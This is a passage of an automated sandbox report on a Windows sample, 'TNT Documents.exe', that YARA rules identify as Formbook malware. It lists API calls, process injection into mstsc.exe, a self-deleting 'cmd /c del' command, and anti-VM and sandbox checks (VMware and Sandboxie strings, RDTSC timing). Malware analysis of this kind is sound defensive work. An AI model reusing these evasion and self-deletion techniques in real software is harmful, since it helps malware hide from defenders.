          Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: String function: 0155B150 appears 35 times
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: String function: 055BB150 appears 35 times
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_004185F0 NtCreateFile
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_004186A0 NtReadFile
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_00418720 NtClose
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_004187D0 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_004185EA NtCreateFile
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_00418642 NtReadFile
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_0041869A NtReadFile
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_004187CB NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_015999A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_015998F0 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599A00 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599A20 NtResumeThread,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599540 NtReadFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_015995D0 NtClose,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_015997A0 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_015996E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599950 NtQueueApcThread
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_015999D0 NtCreateProcessEx
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_0159B040 NtSuspendThread
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599820 NtEnumerateKey
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_015998A0 NtWriteVirtualMemory
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599B00 NtSetValueKey
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_0159A3B0 NtGetContextThread
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599A10 NtQuerySection
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599A80 NtOpenDirectoryObject
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599560 NtWriteFile
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_0159AD30 NtSetContextThread
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599520 NtWaitForSingleObject
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_015995F0 NtQueryInformationFile
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_0159A770 NtOpenThread
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599770 NtSetInformationFile
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599760 NtOpenProcess
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_0159A710 NtOpenProcessToken
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599730 NtQueryVirtualMemory
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599650 NtQueryValueKey
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599670 NtQueryInformationProcess
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599610 NtEnumerateValueKey
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_015996D0 NtCreateKey
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9540 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F95D0 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9650 NtQueryValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F96D0 NtCreateKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F96E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F99A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9560 NtWriteFile
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055FAD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F95F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055FA770 NtOpenThread
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9760 NtOpenProcess
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055FA710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F97A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F99D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055FB040 NtSuspendThread
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F98F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F98A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055FA3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9A10 NtQuerySection
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9A20 NtResumeThread
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_03328720 NtClose
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_033287D0 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_033286A0 NtReadFile
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_033285F0 NtCreateFile
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_033287CB NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_03328642 NtReadFile
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_0332869A NtReadFile
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_033285EA NtCreateFile
          Source: TNT Documents.exe, 00000000.00000000.252292198.00000000000EE000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamekvhWV10.exe8 vs TNT Documents.exe
          Source: TNT Documents.exe, 00000000.00000002.300957032.0000000006DC0000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameMajorRevision.exe< vs TNT Documents.exe
          Source: TNT Documents.exe, 00000000.00000002.294580237.00000000026F2000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameMajorRevision.exe< vs TNT Documents.exe
          Source: TNT Documents.exe, 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameMajorRevision.exe< vs TNT Documents.exe
          Source: TNT Documents.exe, 00000000.00000002.294032469.0000000002381000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameBunifu.UI.dll4 vs TNT Documents.exe
          Source: TNT Documents.exe, 00000005.00000000.280071270.00000000001AE000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamekvhWV10.exe8 vs TNT Documents.exe
          Source: TNT Documents.exe, 00000007.00000000.286422780.0000000000B1E000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamekvhWV10.exe8 vs TNT Documents.exe
          Source: TNT Documents.exe, 00000007.00000002.362999077.0000000003523000.00000040.00020000.sdmp | Binary or memory string: OriginalFilenamemstsc.exej% vs TNT Documents.exe
          Source: TNT Documents.exe, 00000007.00000002.362181801.00000000017DF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs TNT Documents.exe
          Source: TNT Documents.exe, 00000007.00000002.361759586.000000000164F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs TNT Documents.exe
          Source: TNT Documents.exe | Binary or memory string: OriginalFilenamekvhWV10.exe8 vs TNT Documents.exe
          Source: TNT Documents.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: TNT Documents.exe | ReversingLabs: Detection: 46%
          Source: C:\Users\user\Desktop\TNT Documents.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Users\user\Desktop\TNT Documents.exe "C:\Users\user\Desktop\TNT Documents.exe"
          Source: C:\Users\user\Desktop\TNT Documents.exe | Process created: C:\Users\user\Desktop\TNT Documents.exe {path}
          Source: C:\Users\user\Desktop\TNT Documents.exe | Process created: C:\Users\user\Desktop\TNT Documents.exe {path}
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
          Source: C:\Windows\SysWOW64\mstsc.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TNT Documents.exe"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\TNT Documents.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TNT Documents.exe.log
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@9/1@10/4
          Source: C:\Users\user\Desktop\TNT Documents.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4484:120:WilError_01
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\TNT Documents.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: TNT Documents.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: TNT Documents.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: TNT Documents.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wntdll.pdbUGP source: TNT Documents.exe, 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, TNT Documents.exe, 00000007.00000002.361759586.000000000164F000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: TNT Documents.exe, TNT Documents.exe, 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, TNT Documents.exe, 00000007.00000002.361759586.000000000164F000.00000040.00000001.sdmp, mstsc.exe, mstsc.exe, 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp
          Source: Binary string: mstsc.pdbGCTL source: TNT Documents.exe, 00000007.00000002.362758177.0000000003400000.00000040.00020000.sdmp
          Source: Binary string: mstsc.pdb source: TNT Documents.exe, 00000007.00000002.362758177.0000000003400000.00000040.00020000.sdmp

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: TNT Documents.exe, Form1.cs | .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.0.TNT Documents.exe.70000.0.unpack, Form1.cs | .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.2.TNT Documents.exe.70000.0.unpack, Form1.cs | .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.TNT Documents.exe.130000.1.unpack, Form1.cs | .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.TNT Documents.exe.130000.2.unpack, Form1.cs | .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.TNT Documents.exe.130000.0.unpack, Form1.cs | .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.2.TNT Documents.exe.130000.0.unpack, Form1.cs | .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.TNT Documents.exe.130000.3.unpack, Form1.cs | .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 7.2.TNT Documents.exe.aa0000.1.unpack, Form1.cs | .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 7.0.TNT Documents.exe.aa0000.9.unpack, Form1.cs | .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 7.0.TNT Documents.exe.aa0000.2.unpack, Form1.cs | .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 7.0.TNT Documents.exe.aa0000.5.unpack, Form1.cs | .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 7.0.TNT Documents.exe.aa0000.1.unpack, Form1.cs | .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 7.0.TNT Documents.exe.aa0000.7.unpack, Form1.cs | .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_00080576 push ebx; iretd 0_2_000805B7
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_06E70ABA pushfd ; iretd 0_2_06E70ABC
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 5_2_00140576 push ebx; iretd 5_2_001405B7
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_0041B832 push eax; ret 7_2_0041B838
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_0041B83B push eax; ret 7_2_0041B8A2
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_0041B89C push eax; ret 7_2_0041B8A2
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_0040825A push ecx; retf 7_2_0040825B
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_0040C38A pushfd ; ret 7_2_0040C3A0
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_00415CC4 push FFFFFFDFh; iretd 7_2_00415CDA
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_0041B7E5 push eax; ret 7_2_0041B838
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_00AB0576 push ebx; iretd 7_2_00AB05B7
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_015AD0D1 push ecx; ret 7_2_015AD0E4
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_0560D0D1 push ecx; ret 17_2_0560D0E4
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_0331C38A pushfd ; ret 17_2_0331C3A0
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_0331825A push ecx; retf 17_2_0331825B
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_0332B832 push eax; ret 17_2_0332B838
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_0332B83B push eax; ret 17_2_0332B8A2
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_0332B89C push eax; ret 17_2_0332B8A2
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_0332B7E5 push eax; ret 17_2_0332B838
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_03325CC4 push FFFFFFDFh; iretd 17_2_03325CDA
          Source: TNT Documents.exe | Static PE information: 0xA539E86C [Sat Nov 3 17:54:52 2057 UTC]
          Source: initial sample | Static PE information: section name: .text entropy: 7.56105630003

          Hooking and other Techniques for Hiding and Protection:

          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\mstsc.exe | Process created: /c del "C:\Users\user\Desktop\TNT Documents.exe"
          Source: C:\Users\user\Desktop\TNT Documents.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: TNT Documents.exe PID: 4548, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\TNT Documents.exe RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNT Documents.exe RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe RDTSC instruction interceptor: First address: 0000000003318614 second address: 000000000331861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe RDTSC instruction interceptor: First address: 00000000033189AE second address: 00000000033189B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNT Documents.exe TID: 5188 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\mstsc.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_004088E0 rdtsc 7_2_004088E0
Source: C:\Users\user\Desktop\TNT Documents.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\TNT Documents.exe Process information queried: ProcessInformation
Source: explorer.exe, 0000000B.00000000.305896440.0000000008A32000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 0000000B.00000000.305896440.0000000008A32000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000000B.00000000.309276039.000000000ED78000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
Source: explorer.exe, 0000000B.00000000.306183659.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 0000000B.00000000.306183659.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
